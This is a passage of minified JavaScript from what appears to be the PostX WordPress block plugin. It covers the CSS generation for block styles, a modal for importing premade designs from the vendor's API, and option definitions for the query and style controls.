t.value||"number"==typeof t.value||"boolean"==typeof t.value)o=a!=t.value;else{let e=!1;Array.isArray(t.value)&&t.value.forEach((t=>{a!=t&&(e=!0)})),e&&(o=!0)}o=0!=i&&o})),o})(e,l,y))return{_lg:[],_sm:[],_xs:[],_notResponsiveCss:[]};let b,v=[],h=[],f=[],k=[];if(b=y?.id?e[y.key][y.id]?e[y.key][y.id][t]:e[y.key].default[t]:e[t],"object"==typeof b){let e=!1,l="";if(b.lg&&(e=!0,l="object"==typeof b.lg?d(b.lg).data:b.lg+(b.ulg||b.unit||""),v=v.concat(u(o,a,t,l,m,"object"==typeof g?g?.lg:g))),b.sm&&(e=!0,l="object"==typeof b.sm?d(b.sm).data:b.sm+(b.usm||b.unit||""),h=h.concat(u(o,a,t,l,m,"object"==typeof g?g?.sm:g))),b.xs&&(e=!0,l="object"==typeof b.xs?d(b.xs).data:b.xs+(b.uxs||b.unit||""),f=f.concat(u(o,a,t,l,m,"object"==typeof g?g?.xs:g))),!e){const e=d(b),l=s(o,a);"object"==typeof e.data?0!=Object.keys(e.data).length&&(e.data.background&&k.push(l+e.data.background),r(e.data.lg)&&v.push(p(l,e.data.lg)),r(e.data.sm)&&h.push(p(l,e.data.sm)),r(e.data.xs)&&f.push(p(l,e.data.xs)),e.data.simple&&k.push(l+e.data.simple),e.data.font&&v.unshift(e.data.font),e.data.shape&&(e.data.shape.forEach((function(e){k.push(l+e)})),r(e.data.data.lg)&&v.push(c(l,e.data.data.lg)),r(e.data.data.sm)&&h.push(c(l,e.data.data.sm)),r(e.data.data.xs)&&f.push(c(l,e.data.data.xs)))):e.data&&-1==e.data.indexOf("{{")&&("append"==e.action?k.push(l+e.data):k.push(u(o,a,t,e.data,m,g)))}}else"hideExtraLarge"==t?i&&(k=k.concat("@media (min-width: "+(n.breakpointSm||992)+"px) {"+u(o,a,t,b,m,g)+"}")):"hideTablet"==t?i&&(k=k.concat("@media only screen and (max-width: "+(n.breakpointSm||991)+"px) and (min-width: 768px) {"+u(o,a,t,b,m,g)+"}")):"hideMobile"==t?i&&(k=k.concat("@media (max-width: "+(n.breakpointXs||767)+"px) {"+u(o,a,t,b,m,g)+"}")):b&&(k=k.concat(u(o,a,t,b,m,g)));return{_lg:v,_sm:h,_xs:f,_notResponsiveCss:k}}const g=(e,t,l,a=!1)=>{if(!l)return;let r="",p=[],c=[],u=[],d=[];const g=function(){const e=localStorage.getItem("ultpGlobal"+ultp_data.blog);if(e)try{const t=JSON.parse(e);return"object"==typeof t?t:{}}catch{return{}}return{}}();if(Object.keys(e).forEach((o=>{const r="string"==typeof t?wp.blocks.getBlockType(t).attributes:t,y=r[o]?.anotherKey,b=e[y];r[o]&&r[o].hasOwnProperty("style")?r[o].style.forEach(((t,i)=>{if(t?.hasOwnProperty("selector")){const i=t.selector,{_lg:n,_sm:r,_xs:s,_notResponsiveCss:v}=m(e,o,t,i,l,a,g,y,b);p=p.concat(n),c=c.concat(r),u=u.concat(s),d=d.concat(v)}})):((0,i.o6)()&&e.dcEnabled&&"dcFields"===o&&e[o].forEach((t=>{var o;t&&(Object.keys(null!==(o=e.dcGroupStyles[t.id])&&void 0!==o?o:e.dcGroupStyles.default).forEach((o=>{r.dcGroupStyles.fields[o].style?.forEach((i=>{const n=i.selector.replace("{{dcID}}",t.id),{_lg:r,_sm:s,_xs:v,_notResponsiveCss:h}=m(e,o,i,n,l,a,g,y,b,{id:t.id,key:"dcGroupStyles"});p=p.concat(r),c=c.concat(s),u=u.concat(v),d=d.concat(h)}))})),t.fields.forEach((t=>{var o;Object.keys(null!==(o=e.dcFieldStyles[t.id])&&void 0!==o?o:e.dcFieldStyles.default).forEach((o=>{r.dcFieldStyles.fields[o].style?.forEach((i=>{const n=i.selector.replace("{{dcID}}",t.id),{_lg:r,_sm:s,_xs:v,_notResponsiveCss:h}=m(e,o,i,n,l,a,g,y,b,{id:t.id,key:"dcFieldStyles"});p=p.concat(r),c=c.concat(s),u=u.concat(v),d=d.concat(h)}))}))})))})),r[o]&&"array"==r[o].type&&r[o].hasOwnProperty("fields")&&Object.keys(r[o].fields).forEach((t=>{r[o].fields[t].hasOwnProperty("style")&&r[o].fields[t].style.forEach(((a,i)=>{a?.hasOwnProperty("selector")&&Array.isArray(e[o])&&e[o].forEach(((e,o)=>{let i=s(a.selector,l);var r;r=o,i=i.replace(new RegExp("{{REPEAT_CLASS}}","g"),".ultp-repeat-"+r),i=n(i,"{{"+t+"}}",e[t]),d.push(i)}))}))})))})),p.length>0&&(r+=p.join("")),c.length>0&&(r+="@media (max-width: "+(g.breakpointSm||991)+"px) {"+c.join("")+"}"),u.length>0&&(r+="@media (max-width: "+(g.breakpointXs||767)+"px) {"+u.join("")+"}"),d.length>0&&(r+=d.join("")),a)return"true"==ultp_data.settings?.ultp_custom_font&&ultp_data.active?(0,o.RQ)(r,!0):r;"true"==ultp_data.settings?.ultp_custom_font&&(r=(0,o.RQ)(r,!0)),y(r,l)},y=(e,t)=>{if(wp.data.select("core/edit-post")||document.body.classList.contains("site-editor-php")){const l=window.document.getElementsByName("editor-canvas");l[0]?.contentDocument?setTimeout((function(){b(l[0]?.contentDocument,e,t)}),0):b(window.document,e,t)}else b(window.document,e,t)},b=(e,t,l)=>{if(null===(e=e||window.document).getElementById("ultp-block-"+l)){const o=document.createElement("style");o.type="text/css",o.id="ultp-block-"+l,o.styleSheet?o.styleSheet.cssText=t:o.innerHTML=t,e.getElementsByTagName("head")[0].appendChild(o)}else e.getElementById("ultp-block-"+l).innerHTML=t}},66464:(e,t,l)=>{"use strict";l.d(t,{A9:()=>d,Rc:()=>s,Su:()=>g,jE:()=>r,ro:()=>m,zG:()=>u});var o=l(60448),a=l(53049);const i=!((!ultp_data.settings?.hasOwnProperty("disable_google_font")||"yes"==ultp_data.settings.disable_google_font)&&ultp_data.settings?.hasOwnProperty("disable_google_font")),n=["Arial","Tahoma","Verdana","Helvetica","Times New Roman","Trebuchet MS","Georgia"],r=e=>"{ box-shadow:"+(e.inset||"")+" "+e.width.top+"px "+e.width.right+"px "+e.width.bottom+"px "+e.width.left+"px "+e.color+"; }",s=e=>((e=Object.assign({},{type:"solid",width:{},color:"#e5e5e5"},e)).width.unit&&e.width.unit,`{ border-color:  ${e.color?e.color:"#555d66"}; border-style: ${e.type?e.type:"solid"}; border-width: ${d(e.width)}; }`),p=(e,t)=>{const l={};return e&&e.lg&&(l.lg=t.replace(new RegExp("{{key}}","g"),e.lg+((0,o.MR)(e.lg)?e.ulg||e.unit||"px":""))),e&&e.sm&&(l.sm=t.replace(new RegExp("{{key}}","g"),e.sm+((0,o.MR)(e.sm)?e.usm||e.unit||"px":""))),e&&e.xs&&(l.xs=t.replace(new RegExp("{{key}}","g"),e.xs+((0,o.MR)(e.xs)?e.uxs||e.unit||"px":""))),l},c=(e,t)=>(e.lg&&t.lg.push(e.lg),e.sm&&t.sm.push(e.sm),e.xs&&t.xs.push(e.xs),t),u=e=>{let t="";e.family&&"none"!=e.family&&(n.includes(e.family)||(0,a.RQ)().some((t=>t.n==e.family))||i&&(0,o.MR)(e.family)&&(t="@import url('https://fonts.googleapis.com/css?family="+e.family.replace(" ","+")+":"+(e.weight||400)+"');"));const l=!(!e.family||(0,o.MR)(e.family)&&!n.includes(e.family)&&!(0,a.RQ)().some((t=>t.n==e.family)))||i;let r={lg:[],sm:[],xs:[]};e.size&&(r=c(p(e.size,"font-size:{{key}}"),r)),e.height&&(r=c(p(e.height,"line-height:{{key}} !important"),r)),e.spacing&&(r=c(p(e.spacing,"letter-spacing:{{key}}"),r));const s="{"+(e.family&&l&&"none"!=e.family?"font-family:"+e.family+","+(e.type||"sans-serif")+";":"")+(e.weight?"font-weight:"+e.weight+";":"")+(e.color?"color:"+e.color+";":"")+(e.style?"font-style:"+e.style+";":"")+(e.transform?"text-transform:"+e.transform+";":"")+(e.decoration?"text-decoration:"+e.decoration+";":"")+"}";return{lg:r.lg,sm:r.sm,xs:r.xs,simple:s,font:t}},d=e=>{const t=e.unit?e.unit:"px";return""!=e.top&&null!=e.top||""!=e.right&&null!=e.right||""!=e.bottom&&null!=e.bottom||""!=e.left&&null!=e.left?(e.top||0)+t+" "+(e.right||0)+t+" "+(e.bottom||0)+t+" "+(e.left||0)+t:""},m=e=>{let t=e.clip?"-webkit-background-clip: text; -webkit-text-fill-color: transparent;":"";if("color"==e.type)t+=e.color?"background-color: "+e.color+";":"";else if("gradient"==e.type&&e.gradient)"object"==typeof e.gradient?"linear"==e.gradient.type?t+="background-image : linear-gradient("+e.gradient.direction+"deg, "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image : radial-gradient( circle at "+e.gradient.radial+" , "+e.gradient.color1+" "+e.gradient.start+"%,"+e.gradient.color2+" "+e.gradient.stop+"%);":t+="background-image:"+e.gradient+";";else if("image"==e.type){var l;(e.fallbackColor||e.color)&&(t+="background-color:"+(null!==(l=e.fallbackColor)&&void 0!==l?l:e.color)+";"),e.image&&(t+='background-image: url("'+e.image+'");'+(e.position?"background-position-x:"+100*e.position.x+"%;background-position-y:"+100*e.position.y+"%;":"")+(e.attachment?"background-attachment:"+e.attachment+";":"")+(e.repeat?"background-repeat:"+e.repeat+";":"")+(e.size?"background-size:"+e.size+";":""))}else"video"==e.type&&e.fallback&&(t+='background-image: url("'+e.fallback+'"); background-size: cover; background-position: 50% 50%');return e.replace?t:"{"+t+"}"},g=e=>{let t="";return e.hue&&(t=" hue-rotate("+e.hue+"deg)"),e.saturation&&(t+=" saturate("+e.saturation+"%)"),e.brightness&&(t+=" brightness("+e.brightness+"%)"),e.contrast&&(t+=" contrast("+e.contrast+"%)"),e.invert&&(t+=" invert("+e.invert+"%)"),e.blur&&(t+=" blur("+e.blur+"px)"),"filter:"+t+";"}},18958:(e,t,l)=>{"use strict";l.d(t,{Z:()=>c});var o=l(67294),a=l(8949),i=l(64766),n=(l(60448),l(87763)),r=l(83100);const{__}=wp.i18n,{useState:s,useEffect:p}=wp.element,c=e=>{const{clientId:t,attributes:l,label:c,name:u}=e.store,[d,m]=s({designList:[],error:!1,reload:!1,reloadId:"",templatekitCol:"ultp-templatekit-col3",fetch:!1,loading:!1}),{designList:g,error:y,reload:b,reloadId:v,templatekitCol:h,fetch:f,loading:k}=d,[w,x]=s(!1),[T,_]=s([]),[C,E]=s(!1),S=async()=>{m({...d,loading:!0});const e=u.split("/");wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"design"}}).then((t=>{if(t.success){const l=JSON.parse(t.data);e[1]&&void 0===l[e[1]]?(x(!0),P()):(m({...d,loading:!1,designList:l[e[1]]}),x(!1))}}))};p((()=>{I("","","fetchData"),S()}),[]);const P=()=>{m({...d,fetch:!0}),wp.apiFetch({path:"/ultp/v2/fetch_premade_data",method:"POST",data:{type:"fetch_all_data"}}).then((e=>{e.success&&(S(),m({...d,fetch:!1}))}))},L=e=>{const{replaceBlock:o}=wp.data.dispatch("core/block-editor"),a=["queryNumber","queryNumPosts","queryType","queryTax","queryRelation","queryOrderBy","queryOrder","queryInclude","queryExclude","queryAuthor","queryOffset","metaKey","queryExcludeTerm","queryExcludeAuthor","querySticky","queryUnique","queryPosts","queryCustomPosts"];window.fetch("https://ultp.wpxpo.com/wp-json/restapi/v2/single-design",{method:"POST",body:new URLSearchParams("license="+ultp_data.license+"&design_id="+e)}).then((e=>e.text())).then((e=>{if((e=JSON.parse(e)).success&&e.rawData){const i=wp.blocks.parse(e.rawData);let n=i[0].attributes;for(let e=0;e<a.length;e++)n[a[e]]&&delete n[a[e]];n=Object.assign({},l,n),i[0].attributes=n,m({...d,error:!1,reload:!1,reloadId:""}),o(t,i)}else m({...d,error:!0,reload:!1,reloadId:""})})).catch((e=>{console.error(e)}))},I=(e,t="",l="")=>{wp.apiFetch({path:"/ultp/v2/premade_wishlist_save",method:"POST",data:{id:e,action:t,type:l}}).then((e=>{e.success&&_(Array.isArray(e.wishListArr)?e.wishListArr:Object.values(e.wishListArr||{}))}))},B=(0,o.createElement)("span",{className:"ultp-templatekit-design-template-modal-title"},(0,o.createElement)("img",{src:ultp_data.url+`assets/img/blocks/${e.store.name.split("/")[1]}.svg`}),(0,o.createElement)("span",null,e.store.name.split("/")[1].replace("-"," ").replace("-"," #"))),U=(0,r.Z)("","blockPatternPro",ultp_data.affiliate_id);return(0,o.createElement)("div",{className:"ultp-templatekit-design-template-container ultp-templatekit-list-container ultp-predefined-patterns"},c&&(0,o.createElement)("label",null,c),(0,o.createElement)("div",{className:"ultp-popup-header "},(0,o.createElement)("div",{className:"ultp-popup-filter-title"},(0,o.createElement)("div",{className:"ultp-popup-filter-image-head"},B),(0,o.createElement)("div",{className:"ultp-popup-filter-sync-close"},(0,o.createElement)("span",{className:"ultp-templatekit-iconcol2 "+("ultp-templatekit-col2"==h?"ultp-lay-active":""),onClick:()=>m({...d,templatekitCol:"ultp-templatekit-col2"})},n.Z.grid_col1),(0,o.createElement)("span",{className:"ultp-templatekit-iconcol3 "+("ultp-templatekit-col3"==h?"ultp-lay-active":""),onClick:()=>m({...d,templatekitCol:"ultp-templatekit-col3"})},n.Z.grid_col2),(0,o.createElement)("div",{className:"ultp-premade-wishlist-con"},(0,o.createElement)("span",{className:"ultp-premade-wishlist cursor "+(C?"ultp-wishlist-active":""),onClick:()=>{E(!C)}},i.ZP[C?"love_solid":"love_line"])),(0,o.createElement)("div",{onClick:()=>P(),className:"ultp-filter-sync"},(0,o.createElement)("span",{className:"dashicons dashicons-update-alt"+(f?" rotate":"")}),__("Synchronize","ultimate-post")),(0,o.createElement)("button",{className:"ultp-btn-close",onClick:()=>e.closeModal(),id:"ultp-btn-close"},(0,o.createElement)("span",{className:"dashicons dashicons-no-alt"}))))),g?.length?(0,o.createElement)(o.Fragment,null,(0,o.createElement)("div",{className:`ultp-premade-grid ultp-templatekit-content-designs ${h}`},g.map(((e,t)=>(!C||C&&T?.includes(e.ID))&&(0,o.createElement)("div",{key:t,className:"ultp-card ultp-item-list"},(0,o.createElement)("div",{className:"ultp-item-list-overlay"},(0,o.createElement)("a",{className:"ultp-templatekit-img",href:e.liveurl,target:"_blank",rel:"noreferrer"},(0,o.createElement)("img",{src:e.image,loading:"lazy",alt:e.title})),(0,o.createElement)("div",{className:"ultp-list-dark-overlay"},e.pro?!ultp_data.active&&(0,o.createElement)("span",{className:"ultp-templatekit-premium-btn"},__("Pro","ultimate-post")):(0,o.createElement)("span",{className:"ultp-templatekit-premium-btn ultp-templatekit-premium-free-btn"},__("Free","ultimate-post")),(0,o.createElement)("a",{className:"ultp-overlay-view",href:"https://www.wpxpo.com/postx/patterns/#demoid"+e.ID,target:"_blank",rel:"noreferrer"},(0,o.createElement)("span",{className:"dashicons dashicons-visibility"})," ",__("Live Preview","ultimate-post")))),(0,o.createElement)("div",{className:"ultp-item-list-info ultp-p10"},(0,o.createElement)("span",{className:"ultp-templatekit-title"},e.name),(0,o.createElement)("span",{className:"ultp-action-btn"},(0,o.createElement)("span",{className:"ultp-premade-wishlist",onClick:()=>{I(e.ID,T?.includes(e.ID)?"remove":"")}},i.ZP[T?.includes(e.ID)?"love_solid":"love_line"]),e.pro&&!ultp_data.active?(0,o.createElement)("a",{className:"ultp-btns ultpProBtn",target:"_blank",href:U,rel:"noreferrer"},__("Upgrade to Pro","ultimate-post"),"  ➤"):e.pro&&y?(0,o.createElement)("a",{className:"ultp-btn ultp-btn-sm ultp-btn-success",target:"_blank",href:U,rel:"noreferrer"},__("Get License","ultimate-post")):(0,o.createElement)("span",{onClick:()=>{return t=e.ID,l=e.pro,m({...d,reload:!0,reloadId:t}),void(l?ultp_data.active&&L(t):L(t));var t,l},className:"ultp-btns ultp-btn-import"},i.ZP.arrow_down_line,__("Import","ultimate-post"),b&&v==e.ID?(0,o.createElement)("span",{className:"dashicons dashicons-update rotate"}):"")))))))):w||k?(0,o.createElement)("div",{className:"ultp-premade-grid ultp-templatekit-col3 skeletonOverflow"},Array(6).fill(1).map(((e,t)=>(0,o.createElement)("div",{key:t,className:"ultp-item-list"},(0,o.createElement)("div",{className:"ultp-item-list-overlay"},(0,o.createElement)(a.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:300,unit2:"px"}})),(0,o.createElement)("div",{className:"ultp-item-list-info"},(0,o.createElement)(a.Z,{type:"custom_size",c_s:{size1:50,unit1:"%",size2:25,unit2:"px",br:2}}),(0,o.createElement)("span",{className:"ultp-action-btn"},(0,o.createElement)("span",{className:"ultp-premade-wishlist"},(0,o.createElement)(a.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:25,unit2:"px",br:2}})),(0,o.createElement)(a.Z,{type:"custom_size",c_s:{size1:70,unit1:"px",size2:25,unit2:"px",br:2}}))))))):(0,o.createElement)("span",{className:"ultp-image-rotate"},__("No Data Found…","ultimate-post")))}},87282:(e,t,l)=>{"use strict";l.d(t,{$o:()=>g,D3:()=>s,Eo:()=>L,J$:()=>k,Kq:()=>V,M6:()=>b,MF:()=>U,MQ:()=>_,MS:()=>Z,Oi:()=>W,RP:()=>w,Rd:()=>B,Sg:()=>n,Sk:()=>G,Sv:()=>O,U8:()=>r,Vv:()=>v,WJ:()=>M,Xl:()=>D,YA:()=>A,Zv:()=>E,ag:()=>x,dT:()=>N,do:()=>I,f$:()=>h,fL:()=>y,ff:()=>j,iw:()=>C,jQ:()=>z,kr:()=>F,ly:()=>q,pf:()=>T,qS:()=>S,si:()=>p,sx:()=>H,tp:()=>R,wK:()=>P,yX:()=>f});var o=l(69735);const a="https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=quick-query&utm_campaign=postx-dashboard#pricing",{__}=wp.i18n,i={type:"select",key:"metaList",label:__("Meta","ultimate-post"),multiple:!0,options:[{value:"metaAuthor",label:__("Author","ultimate-post")},{value:"metaDate",label:__("Date","ultimate-post")},{value:"metaDateModified",label:__("Modified Date","ultimate-post")},{value:"metaComments",label:__("Comment","ultimate-post")},{value:"metaView",label:__("View Count","ultimate-post")},{value:"metaTime",label:__("Date Time","ultimate-post")},{value:"metaRead",label:__("Reading Time","ultimate-post")}]},n=[{type:"typography",key:"btnTypo",label:__("Typography","ultimate-post")},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"btnColor",label:__("Color","ultimate-post")},{type:"color2",key:"btnBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"btnBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"btnRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"btnShadow",label:__("BoxShadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"btnHoverColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"btnBgHoverColor",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"btnHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"btnHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"btnHoverShadow",label:__("Hover BoxShadow","ultimate-post")}]}]},{type:"dimension",key:"btnSacing",label:__("Spacing","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"btnPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],r=[{type:"typography",key:"counterTypo",label:__("Typography","ultimate-post")},{type:"color",key:"counterColor",label:__("Color","ultimate-post")},{type:"color2",key:"counterBgColor",label:__("Background Color","ultimate-post")},{type:"range",key:"counterWidth",min:0,max:300,step:1,label:__("Width","ultimate-post")},{type:"range",key:"counterHeight",min:0,max:300,step:1,label:__("Height","ultimate-post")},{type:"border",key:"counterBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"counterRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}],s=[{type:"select",key:"arrowStyle",label:__("Arrow Style","ultimate-post"),options:[{value:"leftAngle#rightAngle",label:__("Style 1","ultimate-post"),icon:"leftAngle"},{value:"leftAngle2#rightAngle2",label:__("Style 2","ultimate-post"),icon:"leftAngle2"},{value:"leftArrowLg#rightArrowLg",label:__("Style 3","ultimate-post"),icon:"leftArrowLg"}]},{type:"separator",key:"separatorStyle"},{type:"range",key:"arrowSize",min:0,max:80,step:1,responsive:!0,unit:!0,label:__("Size","ultimate-post")},{type:"range",key:"arrowWidth",min:0,max:80,step:1,responsive:!0,unit:!0,label:__("Width","ultimate-post")},{type:"range",key:"arrowHeight",min:0,max:80,step:1,responsive:!0,unit:!0,label:__("Height","ultimate-post")},{type:"range",key:"arrowVartical",min:-200,max:1e3,step:1,responsive:!0,unit:!0,label:__("Vertical Position","ultimate-post")},{type:"separator",key:"separatorStyle"},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"arrowColor",label:__("Color","ultimate-post")},{type:"color",key:"arrowBg",label:__("Background Color","ultimate-post")},{type:"border",key:"arrowBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"arrowRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"arrowShadow",label:__("BoxShadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"arrowHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"arrowHoverBg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"arrowHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"arrowHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"arrowHoverShadow",label:__("Hover BoxShadow","ultimate-post")}]}]}],p=[{type:"range",key:"dotSpace",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Space","ultimate-post")},{type:"range",key:"dotVartical",min:-200,max:700,step:1,unit:!0,responsive:!0,label:__("Vertical Position","ultimate-post")},{type:"range",key:"dotHorizontal",min:-800,max:800,step:1,unit:!0,responsive:!0,label:__("Horizontal Position","ultimate-post")},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"range",key:"dotWidth",min:0,max:100,step:1,responsive:!0,label:__("Width","ultimate-post")},{type:"range",key:"dotHeight",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")},{type:"color",key:"dotBg",label:__("Background Color","ultimate-post")},{type:"border",key:"dotBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"dotRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"dotShadow",label:__("BoxShadow","ultimate-post")}]},{name:"hover",title:__("Active","ultimate-post"),options:[{type:"range",key:"dotHoverWidth",min:0,max:100,step:1,responsive:!0,label:__("Width","ultimate-post")},{type:"range",key:"dotHoverHeight",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")},{type:"color",key:"dotHoverBg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"dotHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"dotHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"dotHoverShadow",label:__("Hover BoxShadow","ultimate-post")}]}]}],c=[{value:"related_tag",label:__("Related by Tag (Single Post)","ultimate-post"),pro:!0,link:a},{value:"related_category",label:__("Related by Category (Single Post)","ultimate-post"),pro:!0,link:a},{value:"related_cat_tag",label:__("Related by Category & Tag (Single Post)","ultimate-post"),pro:!0,link:a},{value:"related_posts",label:__("Related by Query Builder (Single Post)","ultimate-post"),pro:!0,link:a}],u=[{value:"popular_post_1_day_view",label:__("Trending Today","ultimate-post"),pro:!0,link:a},{value:"popular_post_7_days_view",label:__("This Week’s Popular Posts","ultimate-post"),pro:!0,link:a},{value:"popular_post_30_days_view",label:__("Top Posts of the Month","ultimate-post"),pro:!0,link:a},{value:"popular_post_all_times_view",label:__("All-Time Favorites","ultimate-post"),pro:!0,link:a},{value:"random_post",label:__("Random Posts","ultimate-post"),pro:!0,link:a},{value:"random_post_7_days",label:__("Random Posts (7 Days)","ultimate-post"),pro:!0,link:a},{value:"random_post_30_days",label:__("Random Posts (30 Days)","ultimate-post"),pro:!0,link:a},{value:"latest_post_published",label:__("Latest Posts - Published Date","ultimate-post"),pro:!0,link:a},{value:"latest_post_modified",label:__("Latest Posts - Last Modified Date","ultimate-post"),pro:!0,link:a},{value:"oldest_post_published",label:__("Oldest Posts - Published Date","ultimate-post"),pro:!0,link:a},{value:"oldest_post_modified",label:__("Oldest Posts - Last Modified Date","ultimate-post"),pro:!0,link:a},{value:"alphabet_asc",label:__("Alphabetical ASC","ultimate-post"),pro:!0,link:a},{value:"alphabet_desc",label:__("Alphabetical DESC","ultimate-post"),pro:!0,link:a},{value:"sticky_posts",label:__("Sticky Post","ultimate-post"),pro:!0,link:a},{value:"most_comment",label:__("Most Comments","ultimate-post"),pro:!0,link:a},{value:"most_comment_1_day",label:__("Most Comments (1 Day)","ultimate-post"),pro:!0,link:a},{value:"most_comment_7_days",label:__("Most Comments (7 Days)","ultimate-post"),pro:!0,link:a},{value:"most_comment_30_days",label:__("Most Comments (30 Days)","ultimate-post"),pro:!0,link:a}],d=[{value:"",label:__("- Select Advance Query -","ultimate-post")}],m=[{value:"title",label:__("Title (Alphabetical)","ultimate-post")},{value:"date",label:__("Date (Published)","ultimate-post")},{value:"modified",label:__("Date (Last Modified)","ultimate-post")},{value:"rand",label:__("Random Posts","ultimate-post")},{value:"post__in",label:__("Post In (Show Post by Post ID Order)","ultimate-post")},{value:"menu_order",label:__("Menu Order (Show Page by Page Attributes)","ultimate-post")},{value:"comment_count",label:__("Comment Count","ultimate-post")}];"archive"!=ultp_data?.archive&&m.push({value:"meta_value_num",label:__("Meta Value Number","ultimate-post")});const g=[{type:"select",key:"queryQuick",label:__("Quick Query","ultimate-post"),options:"page"!=ultp_data.post_type?[...d,...c,...u]:[...d,...u,...c]},{type:"search",key:"queryPosts",pro:!0,search:"posts",label:__("Choose Specific Posts","ultimate-post")},{type:"search",key:"queryCustomPosts",pro:!0,search:"allpost",label:__("Add Custom Sections","ultimate-post")},{type:"range",key:"queryNumPosts",min:-1,max:100,label:__("Post Per Page","ultimate-post"),help:"Number of Posts (per Page)",responsive:!0},{type:"range",key:"queryOffset",min:0,max:50,step:1,help:"Offset Post",label:__("Offset Starting Post","ultimate-post")},{type:"toggle",key:"querySticky",label:__("Ignore Sticky Posts","ultimate-post")},{type:"separator"},{type:"select",key:"queryOrderBy",label:__("Order By","ultimate-post"),options:m},{type:"tag",key:"queryOrder",label:!1,options:[{value:"asc",label:__("Ascending","ultimate-post"),icon:"ascending"},{value:"desc",label:__("Descending","ultimate-post"),icon:"descending"}]},{type:"text",key:"metaKey",label:__("Meta Key","ultimate-post")}],y=[{position:1,data:{type:"select",key:"queryTax",label:__("Taxonomy","ultimate-post"),options:[]}},{position:2,data:{type:"search",key:"queryTaxValue",label:__("Taxonomy Value","ultimate-post"),multiple:!0,search:"taxvalue"}},{position:3,data:{type:"tag",key:"queryRelation",label:__("Taxonomy Relation","ultimate-post"),inline:!0,options:[{value:"OR",label:__("OR","ultimate-post")},{value:"AND",label:__("AND","ultimate-post")}]}},{position:4,data:{type:"search",key:"queryAuthor",search:"author",label:__("Author","ultimate-post")}}],b=[{position:1,data:{type:"search",key:"queryExclude",search:"postExclude",label:__("Exclude Post","ultimate-post")}},{position:2,data:{type:"search",key:"queryExcludeTerm",search:"taxExclude",help:"Exclude Term",label:__("Exclude Taxonomy","ultimate-post"),pro:!0}},{position:3,data:{type:"search",key:"queryExcludeAuthor",search:"author",label:__("Exclude Author","ultimate-post"),pro:!0}}],v=[{position:5,data:{type:"alignment",key:"contentAlign",responsive:!1,label:__("Alignment","ultimate-post"),disableJustify:!0}},{position:4,data:{type:"separator"}},{position:5,data:{type:"range",key:"columns",min:1,max:7,step:1,responsive:!0,label:__("Number Of Columns","ultimate-post")}},{position:7,data:{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Column Gap","ultimate-post")}},{position:12,data:{type:"toggle",key:"openInTab",label:__("Links Open in New Tabs","ultimate-post")}},{position:13,data:{type:"tag",key:"contentTag",label:__("Content Tag","ultimate-post"),options:[{value:"article",label:"article"},{value:"section",label:"section"},{value:"div",label:"div"}]}}],h=[{type:"alignment",key:"contentAlign",responsive:!1,label:__("Alignment","ultimate-post"),disableJustify:!0,inline:!0},{type:"separator"},{type:"range",key:"columns",min:1,max:7,step:1,responsive:!0,label:__("Number of Columns","ultimate-post")},{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Column Gap","ultimate-post")},{type:"separator"},{type:"advFilterEnable",key:"advFilterEnable"},{type:"advPagiEnable",key:"advPaginationEnable"},{type:(0,o.o6)()?"toggle":"",label:__("Enable Dynamic Content","ultimate-post"),key:"dcEnabled",help:__("Insert dynamic data & custom fields that update automatically.","ultimate-post")},{type:"toggle",key:"openInTab",label:__("Links Open in New Tabs","ultimate-post")},{type:"separator"},{type:"tag",key:"contentTag",label:__("Content Tag","ultimate-post"),options:[{value:"article",label:"article"},{value:"section",label:"section"},{value:"div",label:"div"}]},{type:"text",key:"notFoundMessage",label:__("No result found Text","ultimate-post")}],f=[{type:"range",key:"columns",min:1,max:7,step:1,responsive:!0,label:__("Columns","ultimate-post")},{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Column 